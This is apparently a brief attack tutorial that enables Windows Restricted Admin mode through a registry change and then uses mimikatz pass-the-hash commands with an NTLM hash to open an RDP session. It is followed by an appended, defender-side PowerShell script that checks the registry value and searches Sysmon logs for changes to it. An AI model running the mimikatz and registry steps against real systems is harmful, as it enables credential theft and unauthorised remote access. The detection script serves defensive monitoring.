Enable Restricted Admin using PowerShell and use mimikatz for RDP
To enable Restricted Admin using PowerShell, run the following command. It sets the `DisableRestrictedAdmin` value under the Lsa key to 0.
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -Name 'DisableRestrictedAdmin' -Value 0 -PropertyType DWORD
Now you can use mimikatz as follows to get an RDP session:
token::elevate
privilege::debug
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin /v:<IP of the system>"
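A defender-side check for the registry change above, as an added example that is not part of the original page: it reports whether `DisableRestrictedAdmin` is set on the local host and lists Sysmon registry events that touched it. The function names are hypothetical, and the event search assumes Sysmon is installed with a configuration that logs registry value sets (Event ID 13) for the Lsa key.

```powershell
# Added example: audit the Restricted Admin registry setting on the local host.
$LsaPath   = 'HKLM:\System\CurrentControlSet\Control\Lsa'
$ValueName = 'DisableRestrictedAdmin'

function Get-RestrictedAdminState {
    # Read the value that the New-ItemProperty command on this page writes.
    # A missing value means it was never set explicitly on this host.
    $prop = Get-ItemProperty -Path $LsaPath -Name $ValueName -ErrorAction SilentlyContinue
    $state = if ($null -eq $prop) { 'NotConfigured' } elseif ($prop.$ValueName -eq 0) { 'Enabled' } else { 'Disabled' }
    [pscustomobject]@{
        Computer = $env:COMPUTERNAME
        Value    = if ($null -eq $prop) { $null } else { $prop.$ValueName }
        State    = $state
    }
}

function Find-RestrictedAdminRegistryChange {
    param([int]$Days = 30)
    # Assumption: Sysmon logs registry value sets (Event ID 13) for the Lsa key.
    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 13
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten the EventData name/value pairs into a hashtable.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            if ($data['TargetObject'] -like "*\Control\Lsa\$ValueName") {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Image   = $data['Image']     # process that wrote the value
                    Details = $data['Details']   # e.g. DWORD (0x00000000)
                }
            }
        }
}

Get-RestrictedAdminState
Find-RestrictedAdminRegistryChange -Days 30
```

A `State` of `Enabled` on a host where no administrator set it, or a Sysmon hit whose `Image` is `powershell.exe` or `reg.exe` outside a change window, is worth investigating.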